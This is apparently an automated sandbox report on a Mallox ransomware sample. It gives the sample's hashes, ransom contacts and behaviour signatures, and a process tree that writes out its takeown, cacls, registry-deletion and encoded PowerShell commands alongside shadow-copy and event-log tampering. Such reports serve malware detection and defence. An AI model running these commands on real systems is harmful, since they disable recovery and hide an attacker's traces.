Analysis
-
max time kernel
105s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
28-03-2023 18:45
Static task
static1
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20230220-en
General
-
Target
tmp.exe
-
Size
530KB
-
MD5
57c683e8ab7b7e1390c037c9a97c7688
-
SHA1
316e4c90085677c5a5f9ccb66ec64c701a89afc7
-
SHA256
060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096
-
SHA512
7462612a9adb287674437924e1ae740c971cac89dfef7290ffd95df618e2b88d25bbafbef0b76dda418ebc2547fa2674c04a455c0341195e13b8fc71387bc953
-
SSDEEP
12288:5hCkSyRGBePYCVWFQ28zqIN6wqFYvt3V/RiR:3CkSyuCYSWFdoqIIwBt3lRiR
Malware Config
Extracted
C:\Program Files\7-Zip\Lang\FILE RECOVERY.txt
mallox.resurrection@onionmail.org
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
-
Clears Windows event logs 1 TTPs 64 IoCs
Processes:
wevtutil.exewevtutil.exepid process 6012 wevtutil.exe 5828 1860 6932 4020 7976 3880 6308 564 7200 5536 5508 7112 7660 1524 8080 6968 5252 6744 7692 7820 4028 1424 7000 8120 wevtutil.exe 6528 1956 6792 6700 5800 1884 6500 4760 5596 6768 6632 5272 3112 5748 5872 7312 8128 4556 5904 7140 1712 5388 4248 6808 6960 5012 8024 6008 3068 7260 5724 1816 6416 7760 4632 4380 7300 4916 5920 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
tmp.exetmp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation tmp.exe -
Modifies file permissions 1 TTPs 18 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 5944 takeown.exe 4616 takeown.exe 640 takeown.exe 2228 takeown.exe 1800 takeown.exe 4136 takeown.exe 888 takeown.exe 6216 takeown.exe 4880 takeown.exe 4884 takeown.exe 4136 takeown.exe 644 takeown.exe 3556 takeown.exe 3908 takeown.exe 7016 takeown.exe 4020 takeown.exe 816 takeown.exe 652 takeown.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
tmp.exedescription ioc process File opened (read-only) \??\T: tmp.exe File opened (read-only) \??\X: tmp.exe File opened (read-only) \??\F: tmp.exe File opened (read-only) \??\I: tmp.exe File opened (read-only) \??\J: tmp.exe File opened (read-only) \??\N: tmp.exe File opened (read-only) \??\P: tmp.exe File opened (read-only) \??\S: tmp.exe File opened (read-only) \??\U: tmp.exe File opened (read-only) \??\V: tmp.exe File opened (read-only) \??\W: tmp.exe File opened (read-only) \??\H: tmp.exe File opened (read-only) \??\L: tmp.exe File opened (read-only) \??\M: tmp.exe File opened (read-only) \??\Q: tmp.exe File opened (read-only) \??\R: tmp.exe File opened (read-only) \??\O: tmp.exe File opened (read-only) \??\Y: tmp.exe File opened (read-only) \??\Z: tmp.exe File opened (read-only) \??\A: tmp.exe File opened (read-only) \??\B: tmp.exe File opened (read-only) \??\E: tmp.exe File opened (read-only) \??\G: tmp.exe File opened (read-only) \??\K: tmp.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 29 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
tmp.exedescription pid process target process PID 3140 set thread context of 3720 3140 tmp.exe tmp.exe -
Drops file in Program Files directory 64 IoCs
Processes:
tmp.exedescription ioc process File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_2019.125.2243.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\it-it\ui-strings.js tmp.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\pl.pak tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription3-pl.xrm-ms tmp.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\osf\progress.gif tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\web_chrome_permissions.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-96.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\ui-strings.js tmp.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\XLSTART\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN020.XML tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionSmallTile.scale-125.png tmp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-100.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-16_contrast-black.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\en_get.svg tmp.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-20_altform-unplated_contrast-black.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Microsoft_WebMediaExtensions.winmd tmp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Google.scale-300.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-32_contrast-white.png tmp.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-white\FILE RECOVERY.txt tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\FILE RECOVERY.txt tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\FILE RECOVERY.txt tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-256.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MediumTile.scale-100.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp5-ul-phn.xrm-ms tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalAppList.targetsize-32_altform-unplated_contrast-white.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\WideTile.scale-100.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\ui-strings.js tmp.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\hr\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\resources.pri tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Call_Connecting_Loud.m4a tmp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarMediumTile.scale-150.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-36_contrast-white.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main.css tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ar-ae\FILE RECOVERY.txt tmp.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\ImmersiveVideoPlayback\Content\Shaders\LoadedModelShaders\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_Subscription-pl.xrm-ms tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\TinyTile.scale-100_contrast-black.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-32_altform-unplated_contrast-white.png tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\FILE RECOVERY.txt tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_start_a_coversation_v2.png tmp.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\FILE RECOVERY.txt tmp.exe File created C:\Program Files\WindowsApps\Deleted\FILE RECOVERY.txt tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-white_scale-100.png tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo tmp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptySearch.scale-150.png tmp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\AppIcon.targetsize-96_altform-unplated_contrast-white.png tmp.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\FILE RECOVERY.txt tmp.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\AppxMetadata\FILE RECOVERY.txt tmp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\FILE RECOVERY.txt tmp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\ui-strings.js tmp.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 7828 8124 6064 4132 sc.exe 5584 sc.exe 6196 sc.exe 4548 sc.exe 7304 sc.exe 7636 7540 sc.exe 5564 sc.exe 7756 sc.exe 7252 sc.exe 2064 sc.exe 6108 7464 sc.exe 6116 sc.exe 7640 sc.exe 4596 sc.exe 2824 sc.exe 3908 sc.exe 7096 sc.exe 7248 sc.exe 7912 sc.exe 276 sc.exe 5240 sc.exe 6248 sc.exe 4616 sc.exe 7192 sc.exe 7496 sc.exe 7408 sc.exe 116 sc.exe 7824 sc.exe 7072 sc.exe 1696 sc.exe 8184 4516 sc.exe 7028 sc.exe 3532 sc.exe 8008 sc.exe 7852 sc.exe 6960 sc.exe 6740 sc.exe 116 sc.exe 5952 sc.exe 284 sc.exe 6676 sc.exe 4484 sc.exe 5504 sc.exe 5748 sc.exe 6168 sc.exe 5680 sc.exe 800 sc.exe 7452 sc.exe 5364 sc.exe 8072 sc.exe 5752 sc.exe 6752 sc.exe 7744 sc.exe 2684 sc.exe 8136 sc.exe 7896 sc.exe 5144 sc.exe 7404 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 2 IoCs
-
Enumerates processes with tasklist 1 TTPs 6 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 6704 tasklist.exe 7804 tasklist.exe 2832 tasklist.exe 5764 tasklist.exe 5580 tasklist.exe 5984 tasklist.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1456 vssadmin.exe -
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3460 7776 6560 6212 6512 6352 7240 taskkill.exe 7648 taskkill.exe 7452 8044 3092 5612 4220 2836 7320 6408 taskkill.exe 6884 3652 7744 7580 4300 6764 6276 8084 taskkill.exe 8148 1124 1040 292 taskkill.exe 2600 7096 6332 taskkill.exe 5008 2820 7960 6112 2104 7920 taskkill.exe 1392 taskkill.exe 7608 6976 1244 2776 4124 taskkill.exe 4456 5508 7900 5248 2836 5500 1104 taskkill.exe 6472 6788 4156 6392 5672 1824 8004 taskkill.exe 5064 6804 3364 6428 7564 1668 7124 -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exetmp.exepid process 4160 powershell.exe 4160 powershell.exe 3720 tmp.exe 3720 tmp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tmp.exepowershell.exetmp.exetakeown.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exesc.exenet.exetaskkill.exewevtutil.exetaskkill.exewevtutil.exedescription pid process Token: SeDebugPrivilege 3140 tmp.exe Token: SeDebugPrivilege 4160 powershell.exe Token: SeTakeOwnershipPrivilege 3720 tmp.exe Token: SeDebugPrivilege 3720 tmp.exe Token: SeTakeOwnershipPrivilege 4616 takeown.exe Token: SeBackupPrivilege 4480 vssvc.exe Token: SeRestorePrivilege 4480 vssvc.exe Token: SeAuditPrivilege 4480 vssvc.exe Token: SeTakeOwnershipPrivilege 4884 takeown.exe Token: SeTakeOwnershipPrivilege 640 takeown.exe Token: SeTakeOwnershipPrivilege 4020 takeown.exe Token: SeTakeOwnershipPrivilege 3908 takeown.exe Token: SeTakeOwnershipPrivilege 2228 takeown.exe Token: SeTakeOwnershipPrivilege 816 takeown.exe Token: SeTakeOwnershipPrivilege 652 takeown.exe Token: SeDebugPrivilege 7264 taskkill.exe Token: SeDebugPrivilege 7240 taskkill.exe Token: SeDebugPrivilege 7460 taskkill.exe Token: SeDebugPrivilege 7360 taskkill.exe Token: SeDebugPrivilege 6344 taskkill.exe Token: SeDebugPrivilege 5672 taskkill.exe Token: SeDebugPrivilege 4256 taskkill.exe Token: SeDebugPrivilege 8004 taskkill.exe Token: SeDebugPrivilege 5396 taskkill.exe Token: SeDebugPrivilege 5212 taskkill.exe Token: SeDebugPrivilege 8124 taskkill.exe Token: SeDebugPrivilege 6072 taskkill.exe Token: SeDebugPrivilege 6008 taskkill.exe Token: SeDebugPrivilege 7548 taskkill.exe Token: SeDebugPrivilege 4348 taskkill.exe Token: SeDebugPrivilege 8088 taskkill.exe Token: SeDebugPrivilege 7884 taskkill.exe Token: SeDebugPrivilege 7600 taskkill.exe Token: SeDebugPrivilege 7596 taskkill.exe Token: SeDebugPrivilege 7920 taskkill.exe Token: SeDebugPrivilege 7932 taskkill.exe Token: SeDebugPrivilege 7812 taskkill.exe Token: SeDebugPrivilege 5608 taskkill.exe Token: SeDebugPrivilege 8056 taskkill.exe Token: SeDebugPrivilege 7844 taskkill.exe Token: SeDebugPrivilege 6052 taskkill.exe Token: SeDebugPrivilege 5984 tasklist.exe Token: SeDebugPrivilege 6704 tasklist.exe Token: SeDebugPrivilege 7804 tasklist.exe Token: SeDebugPrivilege 2832 tasklist.exe Token: SeDebugPrivilege 5764 tasklist.exe Token: SeDebugPrivilege 5580 tasklist.exe Token: SeDebugPrivilege 5500 Token: SeDebugPrivilege 5864 sc.exe Token: SeDebugPrivilege 6192 Token: SeDebugPrivilege 3020 net.exe Token: SeDebugPrivilege 6560 Token: SeDebugPrivilege 7520 Token: SeDebugPrivilege 1752 Token: SeDebugPrivilege 6624 Token: SeDebugPrivilege 7404 taskkill.exe Token: SeDebugPrivilege 292 Token: SeSecurityPrivilege 7516 wevtutil.exe Token: SeBackupPrivilege 7516 wevtutil.exe Token: SeDebugPrivilege 7564 Token: SeDebugPrivilege 7512 Token: SeDebugPrivilege 7784 taskkill.exe Token: SeDebugPrivilege 7540 Token: SeSecurityPrivilege 5216 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tmp.execmd.exetmp.execmd.exedescription pid process target process PID 3140 wrote to memory of 4160 3140 tmp.exe powershell.exe PID 3140 wrote to memory of 4160 3140 tmp.exe powershell.exe PID 3140 wrote to memory of 4160 3140 tmp.exe powershell.exe PID 3140 wrote to memory of 4424 3140 tmp.exe cmd.exe PID 3140 wrote to memory of 4424 3140 tmp.exe cmd.exe PID 3140 wrote to memory of 4424 3140 tmp.exe cmd.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 3140 wrote to memory of 3720 3140 tmp.exe tmp.exe PID 4424 wrote to memory of 4448 4424 cmd.exe reg.exe PID 4424 wrote to memory of 4448 4424 cmd.exe reg.exe PID 4424 wrote to memory of 4448 4424 cmd.exe reg.exe PID 3720 wrote to memory of 2820 3720 tmp.exe cmd.exe PID 3720 wrote to memory of 2820 3720 tmp.exe cmd.exe PID 3720 wrote to memory of 2820 3720 tmp.exe cmd.exe PID 3720 wrote to memory of 1456 3720 tmp.exe vssadmin.exe PID 3720 wrote to memory of 1456 3720 tmp.exe vssadmin.exe PID 3720 wrote to memory of 1544 3720 tmp.exe cmd.exe PID 3720 wrote to memory of 1544 3720 tmp.exe cmd.exe PID 3720 wrote to memory of 1544 3720 tmp.exe cmd.exe PID 3720 wrote to memory of 1652 3720 tmp.exe cmd.exe PID 3720 wrote to memory of 1652 3720 tmp.exe cmd.exe PID 3720 wrote to memory of 1652 3720 tmp.exe cmd.exe PID 4424 wrote to memory of 4616 4424 cmd.exe takeown.exe PID 4424 wrote to memory of 4616 4424 cmd.exe takeown.exe PID 4424 wrote to memory of 4616 4424 cmd.exe takeown.exe PID 1544 wrote to memory of 3728 1544 cmd.exe sc.exe PID 1544 wrote to memory of 3728 1544 cmd.exe sc.exe PID 1544 wrote to memory of 3728 1544 cmd.exe sc.exe PID 4424 wrote to memory of 4792 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 4792 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 4792 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 732 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 732 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 732 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 2856 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 2856 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 2856 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 1576 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 1576 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 1576 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 180 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 180 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 180 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 3596 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 3596 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 3596 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 3020 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 3020 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 3020 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 796 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 796 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 796 4424 cmd.exe cacls.exe PID 4424 wrote to memory of 4752 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 4752 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 4752 4424 cmd.exe cmd.exe PID 4424 wrote to memory of 4984 4424 cmd.exe cacls.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
tmp.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" tmp.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wvjrrzxdkill$-arab.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cmd.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop HaoZipSvc4⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cmd.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
